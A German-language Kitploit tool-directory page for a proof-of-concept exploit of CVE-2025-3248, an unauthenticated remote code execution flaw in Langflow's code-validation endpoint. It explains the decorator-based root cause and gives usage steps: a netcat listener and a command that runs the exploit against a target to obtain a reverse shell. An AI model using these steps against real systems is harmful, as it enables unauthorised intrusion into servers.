Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/hideki233/cve-2025-3248-langflow-rce
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubhideki233/cve-2025-3248-langflow-rce

CVE-2025-3248-Langflow-RCE

Proof-of-concept-Exploit für CVE-2025-3248, eine nicht authentifizierte Remote-Codeausführung-Schwachstelle in Langflow, die Codeinjektion über den /api/v1/validate/code-Endpunkt demonstriert.

Repository anzeigen
vor 16h 30mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-3248 — Langflow Unauthenticated Remote Code Execution

Proof-of-Concept-Exploit für CVE-2025-3248, eine nicht authentifizierte Remote-Codeausführungs-Schwachstelle in Langflow, einer Plattform zum Erstellen von KI-/LLM-Workflows.

  • Betroffene Versionen: Langflow < 1.3.0
  • Behoben in: 1.3.0
  • Schwachstellenklasse: Nicht authentifizierte RCE (CWE-94, Code Injection)
  • Status: Aufgenommen in den Katalog bekannter ausgenutzter Schwachstellen von CISA, nachdem beobachtet wurde, dass sie in freier Wildbahn von Botnetzen ausgenutzt wird.

Grundursache

Langflow stellt einen Endpunkt bereit, POST /api/v1/validate/code, der dazu dient, ein von der Benutzeroberfläche übermitteltes Python-Codefragment (z. B. benutzerdefinierten Komponentencode) zu „validieren". Intern wird der Code mit ast.parse() / compile() geparst und kompiliert und zurückgemeldet, ob er gültig ist — ohne dass eine Authentifizierung erforderlich ist.

Der Fehler: Python wertet Dekorator-Ausdrücke zur Parse-/Kompilierzeit aus, bevor die dekorierte Funktion jemals aufgerufen wird. Wenn der übermittelte „zu validierende Code" einen Dekorator wie diesen enthält:

root@kitploit:~
@exec("...malicious code...")
def test():
    pass

wird der exec(...)-Aufruf in dem Moment ausgeführt, in dem der Code geparst wird — die Validierung muss test() nie tatsächlich aufrufen. In Kombination mit fehlender Authentifizierung und fehlender Sandboxing reicht eine einzige nicht authentifizierte HTTP-Anfrage aus, um beliebige Befehle auf dem Host auszuführen, auf dem Langflow läuft.

Verwendung

  1. Starten Sie einen Listener auf Ihrem Rechner:
    root@kitploit:~
    nc -lvnp 9001
    
  2. Führen Sie den PoC gegen ein Ziel aus:
    root@kitploit:~
    python3 exploit.py --target http://TARGET_IP:7860 --lhost YOUR_IP --lport 9001
    
  3. Wenn das Ziel verwundbar ist, erhalten Sie eine Shell auf dem Listener.
root@kitploit:~
usage: exploit.py [-h] --target TARGET --lhost LHOST [--lport LPORT] [--timeout TIMEOUT]

Anforderungen

root@kitploit:~
pip install requests

Haftungsausschluss

Dieser Code wird nur für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt (Labore, CTFs, Engagements mit ausdrücklicher schriftlicher Genehmigung). Führen Sie dies nicht gegen Systeme aus, die Sie nicht besitzen oder für die Sie keine ausdrückliche Genehmigung zum Testen haben. Der Autor ist nicht für Missbrauch verantwortlich.

Referenzen

  • Langflow-Sicherheitshinweis GHSA-vwmf-pq79-vjvx
  • Horizon3.ai — Unsafe at Any Speed: Abusing Python Exec for Unauth RCE in Langflow AI
  • Keysight — CVE-2025-3248: Langflow Unauthenticated Code Validation
Tool herunterladen